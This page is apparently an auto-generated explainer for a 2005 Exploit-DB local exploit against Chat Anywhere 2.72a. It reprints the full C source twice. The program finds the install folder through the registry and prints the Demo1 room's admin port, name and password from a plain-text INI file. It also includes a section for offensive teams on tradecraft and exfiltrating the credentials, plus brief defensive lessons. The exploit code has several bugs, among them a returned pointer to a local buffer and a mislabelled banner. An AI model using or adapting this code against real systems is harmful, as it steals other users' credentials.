By exploitdb papers bot•February 23, 2005•
papers
Chat Anywhere 2.72a Local Password Disclosure Exploit Explained
Chat Anywhere 2.72a Local Password Disclosure Exploit Explained
What this paper is
This paper details a local exploit for Chat Anywhere version 2.72a. The vulnerability allows a local user to read sensitive configuration information, specifically the "ManagePort", "ManageName", and "ManagePassword" for the "Demo1" chat room, directly from a configuration file. It does not involve remote code execution or privilege escalation.
Simple technical breakdown
The exploit works by:
- Locating the installation directory of Chat Anywhere using the Windows Registry.
- Constructing the full path to the
Demo1.iniconfiguration file. - Reading the
Demo1.inifile. - Searching for specific lines within the file that contain "ManagePort=", "ManageName=", and "ManagePassword=".
- Extracting and displaying the values associated with these lines.
The core of the exploit lies in its ability to parse a plain text configuration file to reveal credentials.
Complete code and payload walkthrough
The provided C code is a Windows executable designed to exploit the vulnerability.
/*****************************************************************
Chat Anywhere 2.72a Local Exploit by Kozan
Application: Chat Anywhere 2.72a
Vendor:LionMax Software
http://www.lionmax.com/
Vulnerable Description: Chat Anywhere 2.72a discloses passwords
to local users.
Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com
*****************************************************************/
#include <windows.h>
#include <stdio.h>
#include <string.h>
#define BUFSIZE 100
HKEY hKey;
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;
char *manage_port, *manage_name, *manage_password;
int adresal(char *FilePath,char *Str)
{
char kr;
int Sayac=0;
int Offset=-1;
FILE *di;
di=fopen(FilePath,"rb");
if( di == NULL )
{
fclose(di);
return -1;
}
while(!feof(di))
{
Sayac++;
for(int i=0;i<strlen(Str);i++)
{
kr=getc(di);
if(kr != Str[i])
{
if( i>0 )
{
fseek(di,Sayac+1,SEEK_SET);
}
break;
}
if( i > ( strlen(Str)-2 ) )
{
Offset = ftell(di)-strlen(Str);
fclose(di);
return Offset;
}
}
}
fclose(di);
return -1;
}
char *oku(char *FilePath,char *Str)
{
FILE *di;
char cr;
int i=0;
char Feature[500];
int Offset = adresal(FilePath,Str);
if( Offset == -1 )
return "";
if( (di=fopen(FilePath,"rb")) == NULL )
return "";
fseek(di,Offset+strlen(Str),SEEK_SET);
while(!feof(di))
{
cr=getc(di);
if(cr == 0x0D) break; // Carriage Return
Feature[i] = cr;
i++;
}
Feature[i] = '\0';
fclose(di);
return Feature;
}
int main()
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
0,
KEY_QUERY_VALUE,
&hKey) == ERROR_SUCCESS)
{
lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
(LPBYTE) prgfiles, &dwBufLen);
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
{
RegCloseKey(hKey);
printf("An error occured!\n");
return 0;
}
RegCloseKey(hKey);
}
else
{
RegCloseKey(hKey);
printf("An error occured!\n");
return 0;
}
try{ // Note: C++ try-catch is used here, but this is a C code snippet. This might be a typo or indicate a C++ compiler was intended.
printf("WWW File Share Pro 2.72 Local Exploit by Kozan\n");
printf("Credits to ATmaCA\n");
printf("www.netmagister.com - www.spyinstructors.com \n\n");
printf("This exploit only shows the Demo1 room's password.\n");
printf("You may improve it freely...\n\n");
strcat(prgfiles,"\\Chat Anywhere\\room\\Demo1.ini");
manage_port=oku(prgfiles,"ManagePort=");
if(manage_port!="") printf("Manage Port: %s\n",manage_port);
manage_name=oku(prgfiles,"ManageName=");
if(manage_name!="") printf("Manage Name: %s\n",manage_name);
manage_password=oku(prgfiles,"ManagePassword=");
if(manage_password!="") printf("Manage Password: %s\n",manage_password);
}catch(...){printf("An error occured!\n"); return 0;} // This catch block is syntactically incorrect for C.
return 0;
}
// milw0rm.com [2005-02-23]Code Fragment/Block -> Practical Purpose
#include <windows.h>,#include <stdio.h>,#include <string.h>: Standard C header files for Windows API functions, standard input/output, and string manipulation.#define BUFSIZE 100: Defines a buffer size for strings, likely for storing paths.HKEY hKey;: A handle to a registry key.char prgfiles[BUFSIZE];: A buffer to store the path to the Program Files directory.DWORD dwBufLen=BUFSIZE;: A variable to store the size of the buffer for registry queries.LONG lRet;: A variable to store the return code from registry operations.char *manage_port, *manage_name, *manage_password;: Pointers to store the extracted configuration values.int adresal(char *FilePath, char *Str): This function searches for a specific string (Str) within a file (FilePath).- Purpose: To find the starting byte offset of a given string within a file.
- Inputs:
FilePath(the path to the file),Str(the string to search for). - Behavior: Opens the file in binary read mode (
"rb"). It reads the file character by character, comparing it against the input stringStr. If a mismatch occurs, it attempts to reposition the file pointer. If the entire string is found, it calculates and returns the offset from the beginning of the file. - Output: The byte offset where
Strstarts inFilePath, or-1if not found or an error occurs.
char *oku(char *FilePath, char *Str): This function reads a value from a file after finding a specific marker string.- Purpose: To extract the value following a specific key (e.g., "ManagePort=") in a configuration file.
- Inputs:
FilePath(the path to the file),Str(the marker string, e.g., "ManagePort="). - Behavior: Calls
adresalto find the offset ofStr. If found, it opens the file again, seeks to the position afterStr, and reads characters until a carriage return (0x0D) is encountered. These characters are stored in theFeaturebuffer. - Output: A dynamically allocated string containing the value found after
Str, or an empty string ("") if not found or an error occurs.
int main(): The main entry point of the program.- Registry Query:
RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion", ...): Attempts to open the specified registry key, which contains system information.RegQueryValueEx(hKey, "ProgramFilesDir", ...): Queries the value of the "ProgramFilesDir" entry within the opened registry key. This value typically points to the directory where applications are installed (e.g., "C:\Program Files").- Error handling checks if the registry operations were successful and if the retrieved data fits within
BUFSIZE.
- File Path Construction:
strcat(prgfiles, "\\Chat Anywhere\\room\\Demo1.ini");: Appends the relative path to theDemo1.iniconfiguration file to the retrieved "ProgramFilesDir". This constructs the full path to the target file.
- Data Extraction and Display:
manage_port = oku(prgfiles, "ManagePort=");: Callsokuto find and extract the value associated with "ManagePort=".if(manage_port != "") printf("Manage Port: %s\n", manage_port);: If a value was found, it prints it to the console.- Similar calls are made for
manage_nameandmanage_password.
try-catchblock: Thetry{...}catch(...){...}syntax is C++ exception handling. In a pure C context, this would be a syntax error. It's likely intended to catch any unexpected errors during the file operations or string processing, though the C implementation ofokuandadresaldoesn't explicitly throw exceptions. Thecatch(...)would catch any C++ exception.
- Registry Query:
Shellcode/Payload Segments:
There is no shellcode or executable payload in the traditional sense. The "payload" is the C code itself, which when compiled and executed, performs the actions described above. The output of the program is the disclosure of the sensitive configuration values.
Practical details for offensive operations teams
- Required Access Level: Local user access to the target Windows machine. No administrative privileges are required to run this exploit, as it only reads from a configuration file and the registry.
- Lab Preconditions:
- A Windows machine with Chat Anywhere 2.72a installed.
- The
Demo1.inifile must exist in the expected location (<ProgramFilesDir>\Chat Anywhere\room\). - The
Demo1.inifile must contain lines starting with "ManagePort=", "ManageName=", and "ManagePassword=".
- Tooling Assumptions:
- A C compiler (like MinGW or Visual Studio) to compile the exploit code into an executable.
- The compiled executable needs to be transferred to the target machine.
- Execution Pitfalls:
- Incorrect Installation Path: If Chat Anywhere is installed in a non-standard location, the registry query for "ProgramFilesDir" might be incorrect, or the application might not be installed at all. The exploit relies on the default installation path.
- File Permissions: While unlikely for a local user to be denied read access to their own program files, extremely restrictive file permissions could prevent the exploit from reading
Demo1.ini. - File Not Found/Corrupted: If
Demo1.iniis missing, corrupted, or doesn't contain the expected key-value pairs, the exploit will simply report no information found for those specific fields. - C++ Syntax in C: The
try-catchblock is a C++ construct. If compiled with a strict C compiler, it will cause an error. It should be removed or replaced with standard C error handling if targeting a pure C environment.
- Tradecraft Considerations:
- Stealth: Executing a compiled C program is generally low-noise. However, the creation of a new process will be logged.
- Persistence: This exploit is a one-time information disclosure. It does not establish persistence.
- Data Exfiltration: The disclosed credentials would need to be manually exfiltrated by the operator or incorporated into a larger script that sends them out.
- Likely Failure Points:
- Chat Anywhere not installed or a different version.
Demo1.inifile missing or not containing the target strings.- Registry key or value not found.
- The
try-catchblock causing compilation issues if not handled correctly.
Where this was used and when
- Context: This exploit targets a specific, older version of Chat Anywhere (2.72a). It was likely used in scenarios where an attacker had local access to a machine running this vulnerable software. The primary goal would be to obtain credentials for managing chat rooms, which could then be used for further social engineering, eavesdropping, or disruption within the chat application.
- When: Published on February 23, 2005. This indicates the vulnerability existed and was exploited around that time. Given the age of the software and the exploit, it's highly unlikely to be relevant against modern systems or current versions of any similar chat application.
Defensive lessons for modern teams
- Configuration File Security: Sensitive information like passwords should never be stored in plain text configuration files. Use encryption, secure credential stores, or hashing mechanisms.
- Input Validation and Sanitization: While not directly applicable to this exploit's discovery, applications should be robust against malformed input. However, the core issue here is the disclosure of information, not an input vulnerability.
- Regular Patching and Updates: Keeping software updated is crucial. Vendors often fix such vulnerabilities in newer releases. This exploit targets a very old version.
- Principle of Least Privilege: Ensure applications run with the minimum necessary permissions. While this exploit doesn't require elevated privileges, it highlights how local users can access sensitive data if not properly protected.
- File Integrity Monitoring: Monitoring critical configuration files for unauthorized modifications or access can help detect such disclosures.
- Secure Coding Practices: Developers must be trained to avoid common pitfalls like storing credentials in plain text.
ASCII visual (if applicable)
This exploit's flow is linear and file-based, making a complex ASCII diagram unnecessary. The process is:
+---------------------+ +-------------------------+ +-----------------------+
| Target Machine | | Windows Registry | | Chat Anywhere Config |
| (Local User Access) | --> | (Query ProgramFilesDir) | --> | (Demo1.ini file) |
+---------------------+ +-------------------------+ +-----------------------+
|
v
+-------------------------+
| Exploit Code Reads |
| "ManagePort=", |
| "ManageName=", |
| "ManagePassword=" |
+-------------------------+
|
v
+-------------------------+
| Output to Console |
+-------------------------+Source references
- Paper ID: 837
- Paper Title: Chat Anywhere 2.72a Local Password Disclosure
- Author: Kozan
- Published: 2005-02-23
- Keywords: Windows, local
- Paper URL: https://www.exploit-db.com/papers/837
- Raw URL: https://www.exploit-db.com/raw/837
Original Exploit-DB Content (Verbatim)
/*****************************************************************
Chat Anywhere 2.72a Local Exploit by Kozan
Application: Chat Anywhere 2.72a
Vendor:LionMax Software
http://www.lionmax.com/
Vulnerable Description: Chat Anywhere 2.72a discloses passwords
to local users.
Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com
*****************************************************************/
#include <windows.h>
#include <stdio.h>
#include <string.h>
#define BUFSIZE 100
HKEY hKey;
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;
char *manage_port, *manage_name, *manage_password;
int adresal(char *FilePath,char *Str)
{
char kr;
int Sayac=0;
int Offset=-1;
FILE *di;
di=fopen(FilePath,"rb");
if( di == NULL )
{
fclose(di);
return -1;
}
while(!feof(di))
{
Sayac++;
for(int i=0;i<strlen(Str);i++)
{
kr=getc(di);
if(kr != Str[i])
{
if( i>0 )
{
fseek(di,Sayac+1,SEEK_SET);
}
break;
}
if( i > ( strlen(Str)-2 ) )
{
Offset = ftell(di)-strlen(Str);
fclose(di);
return Offset;
}
}
}
fclose(di);
return -1;
}
char *oku(char *FilePath,char *Str)
{
FILE *di;
char cr;
int i=0;
char Feature[500];
int Offset = adresal(FilePath,Str);
if( Offset == -1 )
return "";
if( (di=fopen(FilePath,"rb")) == NULL )
return "";
fseek(di,Offset+strlen(Str),SEEK_SET);
while(!feof(di))
{
cr=getc(di);
if(cr == 0x0D) break;
Feature[i] = cr;
i++;
}
Feature[i] = '\0';
fclose(di);
return Feature;
}
int main()
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
0,
KEY_QUERY_VALUE,
&hKey) == ERROR_SUCCESS)
{
lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
(LPBYTE) prgfiles, &dwBufLen);
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
{
RegCloseKey(hKey);
printf("An error occured!\n");
return 0;
}
RegCloseKey(hKey);
}
else
{
RegCloseKey(hKey);
printf("An error occured!\n");
return 0;
}
try{
printf("WWW File Share Pro 2.72 Local Exploit by Kozan\n");
printf("Credits to ATmaCA\n");
printf("www.netmagister.com - www.spyinstructors.com \n\n");
printf("This exploit only shows the Demo1 room's password.\n");
printf("You may improve it freely...\n\n");
strcat(prgfiles,"\\Chat Anywhere\\room\\Demo1.ini");
manage_port=oku(prgfiles,"ManagePort=");
if(manage_port!="") printf("Manage Port: %s\n",manage_port);
manage_name=oku(prgfiles,"ManageName=");
if(manage_name!="") printf("Manage Name: %s\n",manage_name);
manage_password=oku(prgfiles,"ManagePassword=");
if(manage_password!="") printf("Manage Password: %s\n",manage_password);
}catch(...){printf("An error occured!\n"); return 0;}
return 0;
}
// milw0rm.com [2005-02-23]